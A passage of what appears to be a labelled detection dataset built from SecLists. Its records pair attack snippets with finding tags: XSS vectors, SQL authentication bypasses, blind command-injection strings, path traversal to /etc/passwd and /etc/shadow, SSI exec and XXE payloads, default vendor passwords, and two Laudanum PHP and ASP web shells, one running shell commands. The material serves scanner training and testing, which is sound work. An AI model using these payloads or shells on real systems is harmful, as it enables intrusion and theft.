"<input type=\"text\" value=\"<bdi oncopy=\"alert(1)\" contenteditable>test</bdi>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<bdi oncopy=\"alert(1)\" contenteditable>test</bdi>", "injection_type": "XSS"}}]} {"id": "seclists_01275", "source": "seclists", "source_license": "MIT", "text": "filename=%2527%3B%20str%3D%24%28echo%20SNJPYD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2527%3B%20str%3D%24%28echo%20SNJPYD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//", "injection_type": "cmd"}}]} {"id": "seclists_01276", "source": "seclists", "source_license": "MIT", "text": "{% block content %}\n<h1>Hello self</h1>\n{% endblock %}", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "self", "injection_type": "SSTI"}}]} {"id": "seclists_01277", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>", "injection_type": "XSS"}}]} {"id": "seclists_01278", "source": "seclists", "source_license": "MIT", "text": "<?php\n/* *****************************************************************************\n***\n*** Laudanum Project\n*** A Collection of Injectable Files used during a Penetration Test\n***\n*** More information is available at:\n*** http://laudanum.secureideas.net\n*** laudanum@secureideas.net\n***\n*** Project Leads:\n*** Kevin Johnson <kjohnson@secureideas.net\n*** Tim Medin <tim@counterhack.com>\n***\n*** Copyright 2014 by Kevin Johnson and the Laudanum Team\n***\n********************************************************************************\n***\n*** This file provides a host lookup by ip address.\n*** Written by Jason Gillam <jgillam@secureideas.com>\n***\n********************************************************************************\n*** This program is free software; you can redistribute it and/or\n*** modify it under the terms of the GNU General Public License\n*** as published by the Free Software Foundation; either version 2\n*** of the License, or (at your option) any later version.\n***\n*** This program is distributed in the hope that it will be useful,\n*** but WITHOUT ANY WARRANTY; without even the implied warranty of\n*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n*** GNU General Public License for more details.\n***\n*** You can get a copy of the GNU General Public License from this\n*** address: http://www.gnu.org/copyleft/gpl.html#SEC1\n*** You can also write to the Free Software Foundation, Inc., 59 Temple\n*** Place - Suite 330, Boston, MA 02111-1307, USA.\n***\n***************************************************************************** */\n\ninclude 'ipcheck.php';\n\n\n/* This error handler will turn all notices, warnings, and errors into fatal\n * errors, unless they have been suppressed with the @-operator. */\nfunction error_handler($errno, $errstr, $errfile, $errline, $errcontext) {\n /* The @-opertor (used with chdir() below) temporarely makes\n * error_reporting() return zero, and we don't want to die in that case.\n * We do note the error in the output, though. */\n if (error_reporting() == 0) {\n $_SESSION['output'] .= $errstr . \"\\n\";\n } else {\n die('<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\n \"http://www.w3.org/TR/html4/strict.dtd\">\n<html>\n<head>\n <title>Laudanum PHP Hostname by IP Lookup</title>\n</head>\n<body>\n <h1>Fatal Error!</h1>\n <p><b>' . $errstr . '</b></p>\n <p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>\n\n <hr>\n <address>\n Copyright &copy; 2014, <a href=\"mailto:laudanum@secureideas.net\">Kevin Johnson</a> and the Laudanum team.<br/>\n Written by Tim Medin.<br/>\n Get the latest version at <a href=\"http://laudanum.secureideas.net\">laudanum.secureideas.net</a>.\n </address>\n\n</body>\n</html>');\n }\n}\n\nset_error_handler('error_handler');\n\n\n/* Initialize some variables we need again and again. */\n$query = isset($_POST['query']) ? $_POST['query'] : '';\n$type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY';\n?>\n<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\n \"http://www.w3.org/TR/html4/strict.dtd\">\n<html>\n<head>\n <title>Laudanum Host Lookup</title>\n <link rel=\"stylesheet\" href=\"style.css\" type=\"text/css\">\n\n <script type=\"text/javascript\">\n function init() {\n document.dns.query.focus();\n }\n </script>\n</head>\n<body onload=\"init()\">\n\n<h1>Host Lookup 0.1</h1>\n<form name=\"dns\" action=\"<?php echo $_SERVER['PHP_SELF'] ?>\" method=\"POST\">\n<fieldset>\n <legend>Host Lookup:</legend>\n <p>IP:<input name=\"query\" type=\"text\">\n </select>\n <input type=\"submit\" value=\"Submit\">\n</fieldset>\n</form>\n\n\n<?php\nif ($query != '')\n{\n $result = gethostbyaddr($query);\n echo \"<pre><results>\";\n echo \"Result = \";\n print_r($result);\n echo \"</results></pre>\";\n}\n?>\n <hr>\n <address>\n Copyright &copy; 2014, <a href=\"mailto:laudanum@secureideas.net\">Kevin Johnson</a> and the Laudanum team.<br/>\n Written by Tim Medin.<br/>\n Get the latest version at <a href=\"http://laudanum.secureideas.net\">laudanum.secureideas.net</a>.\n </address>\n", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "php", "filename": "host.php"}}]} {"id": "seclists_01279", "source": "seclists", "source_license": "MIT", "text": "filename=&&echo$IFSKJOVJF$((86%2B99))$(echo$IFSKJOVJF)KJOVJF", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&&echo$IFSKJOVJF$((86%2B99))$(echo$IFSKJOVJF)KJOVJF", "injection_type": "cmd"}}]} {"id": "seclists_01280", "source": "seclists", "source_license": "MIT", "text": "<%\n' *******************************************************************************\n' ***\n' *** Laudanum Project\n' *** A Collection of Injectable Files used during a Penetration Test\n' ***\n' *** More information is available at:\n' *** http://laudanum.secureideas.net\n' *** laudanum@secureideas.net\n' ***\n' *** Project Leads:\n' *** Kevin Johnson <kjohnson@secureideas.net\n' *** Tim Medin <tim@counterhack.com>\n' ***\n' *** Copyright 2014 by Kevin Johnson and the Laudanum Team\n' ***\n' ********************************************************************************\n' ***\n' *** This file provides access to DNS on the system.\n' *** Written by Tim Medin <tim@counterhack.com>\n' ***\n' ********************************************************************************\n' *** This program is free software; you can redistribute it and/or\n' *** modify it under the terms of the GNU General Public License\n' *** as published by the Free Software Foundation; either version 2\n' *** of the License, or (at your option) any later version.\n' ***\n' *** This program is distributed in the hope that it will be useful,\n' *** but WITHOUT ANY WARRANTY; without even the implied warranty of\n' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n' *** GNU General Public License for more details.\n' ***\n' *** You can get a copy of the GNU General Public License from this\n' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1\n' *** You can also write to the Free Software Foundation, Inc., Temple\n' *** Place - Suite Boston, MA USA.\n' ***\n' ***************************************************************************** */\n\n' ***************** Config entries below ***********************\n\n' IPs are enterable as individual addresses TODO: add CIDR support\nDim allowedIPs \nDim allowed\nDim qtypes\nDim qtype\nDim validtype\nDim query\nDim i\nDim command\n\nallowedIPs = \"192.168.0.1,127.0.0.1\"\n' Just in cace you added a space in the line above\nallowedIPs = replace(allowedIPS,\" \",\"\")\n'turn it into an array\nallowedIPs = split(allowedIPS,\",\") '\n\n' make sure the ip is allowed\nallowed = 0\nfor i = lbound(allowedIPs) to ubound(allowedIPs)\n\tif allowedIPS(i) = Request.ServerVariables(\"REMOTE_ADDR\") then\n\t\tallowed = 1\n\t\tExit For\n\tend if\nnext\n' send a 404 if not the allowed IP\nif allowed = 0 then\n\tResponse.Status = \"404 File Not Found\"\n\tResponse.Write(Response.Status & Request.ServerVariables(\"REMOTE_ADDR\"))\n\tResponse.End\nend if\n\n%>\n<html>\n<head>\n <title>Laudanum ASP DNS Access</title>\n <link rel=\"stylesheet\" href=\"style.css\" type=\"text/css\">\n \n <script type=\"text/javascript\">\n function init() {\n document.dns.query.focus();\n }\n </script>\n</head>\n<body onload=\"init()\">\n \n<h1>DNS Query 0.1</h1>\n<%\n\n' dns query types as defined as by windows nslookup\nqtypes = split (\"ANY,A,AAAA,A+AAAA,CNAME,MX,NS,PTR,SOA,SRV\",\",\")\nqtype = UCase(Request.Form(\"type\"))\n\n' see if the query type is valid, if it isn't then set it.\nvalidtype = 0\nfor i = lbound(qtypes) to ubound(qtypes)\n\tif qtype = qtypes(i) then\n\t\tvalidtype = 1\n\t\tExit For\n\tend if \nnext\nif validtype = 0 then qtype = \"ANY\"\n\n%>\n<form name=\"dns\" method=\"POST\">\n<fieldset>\n <legend>DNS Lookup:</legend>\n <p>Query:<input name=\"query\" type=\"text\">\n Type:<select name=\"type\">\n<%\nfor i = lbound(qtypes) to ubound(qtypes)\n\tif qtype = qtypes(i) then\n\t\tResponse.Write(\"<option value=\"\"\" & qtypes(i) & \"\"\" SELECTED>\" & qtypes(i) & \"</option>\")\n\telse\n\t\t\n\t\tResponse.Write(\"<option value=\"\"\" & qtypes(i) & \"\"\">\" & qtypes(i) & \"</option>\")\n\tend if\nnext\n%>\n </select>\n <input type=\"submit\" value=\"Submit\">\n</fieldset>\n</form>\n<%\n\n' get the query\nquery = trim(Request.Form(\"query\"))\n' the query must be sanitized a bit to try to make sure the shell doesn't hang\nquery = replace(query, \" \", \"\")\nquery = replace(query, \";\", \"\")\n\nif len(query) > 0 then\n\tcommand = \"nslookup -type=\" & qtype & \" \" & query \n\tSet objWShell = Server.CreateObject(\"WScript.Shell\")\n\tSet objCmd = objWShell.Exec(command)\n\tstrPResult = objCmd.StdOut.Readall()\n\tset", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "asp", "filename": "dns.asp"}}]} {"id": "seclists_01281", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit String: <BASE HREF=\"javascript:alert('XSS');//\"></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <BASE HREF=\"javascript:alert('XSS');//\">", "injection_type": "XSS"}}]} {"id": "seclists_01282", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = admin\") or (\"1\"=\"1\"#", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin\") or (\"1\"=\"1\"#", "injection_type": "SQL"}}]} {"id": "seclists_01283", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=body:after{ HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "body:after{", "injection_type": "XSS"}}]} {"id": "seclists_01284", "source": "seclists", "source_license": "MIT", "text": "# LDAP query log\nsearchFilter: @*", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "@*", "injection_type": "LDAP"}}]} {"id": "seclists_01285", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:SAF Tehnika,administrator,d1scovery,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "SAF Tehnika,administrator,d1scovery,"}}]} {"id": "seclists_01286", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %2522%7C%20%5B%209%20-ne%20%24%28echo%20DAZTLG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2522%7C%20%5B%209%20-ne%20%24%28echo%20DAZTLG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C", "injection_type": "cmd"}}]} {"id": "seclists_01287", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<div draggable=\"true\" contenteditable>drag me</div><image ondragover=alert(1) contenteditable>drop here</image> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<div draggable=\"true\" contenteditable>drag me</div><image ondragover=alert(1) contenteditable>drop here</image>", "injection_type": "XSS"}}]} {"id": "seclists_01288", "source": "seclists", "source_license": "MIT", "text": "password: Lucent,LUCENT01,UI-PSWD-01,requires GSI software\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Lucent,LUCENT01,UI-PSWD-01,requires GSI software"}}]} {"id": "seclists_01289", "source": "seclists", "source_license": "MIT", "text": "filename=//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "//", "injection_type": "cmd"}}]} {"id": "seclists_01290", "source": "seclists", "source_license": "MIT", "text": "username=admin' or '1'='1&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin' or '1'='1", "injection_type": "SQL"}}]} {"id": "seclists_01291", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:Quintum Technologies Inc.,admin,admin,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Quintum Technologies Inc.,admin,admin,"}}]} {"id": "seclists_01292", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=pedro\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "pedro"}}]} {"id": "seclists_01293", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%27%20or%201=1 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%20or%201=1", "injection_type": "cmd"}}]} {"id": "seclists_01294", "source": "seclists", "source_license": "MIT", "text": "POST /api/import HTTP/1.1\nContent-Type: application/xml\n\n<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" xmlns:php=\"http://php.net/xsl\"><xsl:template match=\"/\"><script>alert(123)</script></xsl:template></xsl:stylesheet>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" xmlns:php=\"http://php.net/xsl\"><xsl:template match=\"/\"><script>alert(123)</script></xsl:template></xsl:stylesheet>", "injection_type": "XXE"}}]} {"id": "seclists_01295", "source": "seclists", "source_license": "MIT", "text": "{% block content %}\n<h1>Hello settings.DEBUG</h1>\n{% endblock %}", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "settings.DEBUG", "injection_type": "SSTI"}}]} {"id": "seclists_01296", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=amstel\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "amstel"}}]} {"id": "seclists_01297", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Name: JS string concatenation breaker HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: JS string concatenation breaker", "injection_type": "XSS"}}]} {"id": "seclists_01298", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=<IMG SRC=JaVaScRiPt:alert('XSS')> HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<IMG SRC=JaVaScRiPt:alert('XSS')>", "injection_type": "cmd"}}]} {"id": "seclists_01299", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><fieldset onkeydown=\"alert(1)\" contenteditable>test</fieldset></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<fieldset onkeydown=\"alert(1)\" contenteditable>test</fieldset>", "injection_type": "XSS"}}]} {"id": "seclists_01300", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Tags: general, evil tags, internet explorer</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags, internet explorer", "injection_type": "XSS"}}]} {"id": "seclists_01301", "source": "seclists", "source_license": "MIT", "text": "username=insert&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "insert", "injection_type": "SQL"}}]} {"id": "seclists_01302", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Name: List-style-image HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: List-style-image", "injection_type": "XSS"}}]} {"id": "seclists_01303", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=enterme\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "enterme"}}]} {"id": "seclists_01304", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = ''sqlattempt1';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'sqlattempt1", "injection_type": "SQL"}}]} {"id": "seclists_01305", "source": "seclists", "source_license": "MIT", "text": "GET /profile?name=$context.TOOLS_VERSION HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "$context.TOOLS_VERSION", "injection_type": "SSTI"}}]} {"id": "seclists_01306", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Author Name: PHPIDS Group HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: PHPIDS Group", "injection_type": "XSS"}}]} {"id": "seclists_01307", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Tags: general, JS breaking HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, JS breaking", "injection_type": "XSS"}}]} {"id": "seclists_01308", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"path_translated\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"path_translated\" -->", "injection_type": "SSI"}}]} {"id": "seclists_01309", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit String: 123[''+<_>ev</_>+<_>al</_>](''+<_>aler</_>+<_>t</_>+<_>(1)</_>);\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: 123[''+<_>ev</_>+<_>al</_>](''+<_>aler</_>+<_>t</_>+<_>(1)</_>);", "injection_type": "XSS"}}]} {"id": "seclists_01310", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=&#x3c HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#x3c", "injection_type": "cmd"}}]} {"id": "seclists_01311", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><s onbeforepaste=\"alert(1)\" contenteditable>test</s></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<s onbeforepaste=\"alert(1)\" contenteditable>test</s>", "injection_type": "XSS"}}]} {"id": "seclists_01312", "source": "seclists", "source_license": "MIT", "text": "password: mandrake\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "mandrake"}}]} {"id": "seclists_01313", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host='.print(`echo%20JLXMKL\\necho%20$((67%2B26))\\necho%20JLXMKL\\necho%20JLXMKL`)%3B.%25252522JLXMKL HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'.print(`echo%20JLXMKL\\necho%20$((67%2B26))\\necho%20JLXMKL\\necho%20JLXMKL`)%3B.%25252522JLXMKL", "injection_type": "cmd"}}]} {"id": "seclists_01314", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Obfuscated DOM element creation</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Obfuscated DOM element creation", "injection_type": "XSS"}}]} {"id": "seclists_01315", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Description: Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word \u201dXSS\u201d will pop up.\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word \u201dXSS\u201d will pop up.", "injection_type": "XSS"}}]} {"id": "seclists_01316", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: @'", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "@'", "injection_type": "cmd"}}]} {"id": "seclists_01317", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=\"<?xml version=\"\"1.0\"\" encoding=\"\"ISO-8859-1\"\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"\"file:////dev/random\"\">]><foo>&xxe;</foo>\" HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"<?xml version=\"\"1.0\"\" encoding=\"\"ISO-8859-1\"\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"\"file:////dev/random\"\">]><foo>&xxe;</foo>\"", "injection_type": "cmd"}}]} {"id": "seclists_01318", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"</script>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "</script>", "injection_type": "XSS"}}]} {"id": "seclists_01319", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><div draggable=\"true\" contenteditable>drag me</div><code ondrop=alert(1) contenteditable>drop here</code></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<div draggable=\"true\" contenteditable>drag me</div><code ondrop=alert(1) contenteditable>drop here</code>", "injection_type": "XSS"}}]} {"id": "seclists_01320", "source": "seclists", "source_license": "MIT", "text": "filename=`/usr/bin/id`", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "`/usr/bin/id`", "injection_type": "cmd"}}]} {"id": "seclists_01321", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<audio src onloadstart=alert(1)>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<audio src onloadstart=alert(1)>", "injection_type": "XSS"}}]} {"id": "seclists_01322", "source": "seclists", "source_license": "MIT", "text": "filename=%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KJBKAZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KJBKAZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20", "injection_type": "cmd"}}]} {"id": "seclists_01323", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%27%3B%20str%3D%24%28echo%20DHYUHH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%3B%20str%3D%24%28echo%20DHYUHH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23", "injection_type": "cmd"}}]} {"id": "seclists_01324", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Author Name: ha.ckers.org</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]} {"id": "seclists_01325", "source": "seclists", "source_license": "MIT", "text": "filename=/../../../../../../../../../../etc/passwd^^", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "/../../../../../../../../../../etc/passwd^^", "injection_type": "cmd"}}]} {"id": "seclists_01326", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Tags: general, evil tags, injection, internet explorer HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags, injection, internet explorer", "injection_type": "XSS"}}]} {"id": "seclists_01327", "source": "seclists", "source_license": "MIT", "text": "username=--sp_password&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "--sp_password", "injection_type": "SQL"}}]} {"id": "seclists_01328", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=IP Encoding HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "IP Encoding", "injection_type": "XSS"}}]} {"id": "seclists_01329", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<pre><!--#exec cmd=\"whoami\"--></pre>\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<pre><!--#exec cmd=\"whoami\"--></pre>", "injection_type": "SSI"}}]} {"id": "seclists_01330", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=<IMG DYNSRC=\"javascript:alert('XSS')\"> HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<IMG DYNSRC=\"javascript:alert('XSS')\">", "injection_type": "cmd"}}]} {"id": "seclists_01331", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"netsite_root\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"netsite_root\" -->", "injection_type": "SSI"}}]} {"id": "seclists_01332", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow", "injection_type": "cmd"}}]} {"id": "seclists_01333", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = ''OR '' = '\tAllows authentication without a valid username.';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'OR '' = '\tAllows authentication without a valid username.", "injection_type": "SQL"}}]} {"id": "seclists_01334", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"total_hits\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"total_hits\" -->", "injection_type": "SSI"}}]} {"id": "seclists_01335", "source": "seclists", "source_license": "MIT", "text": "GET 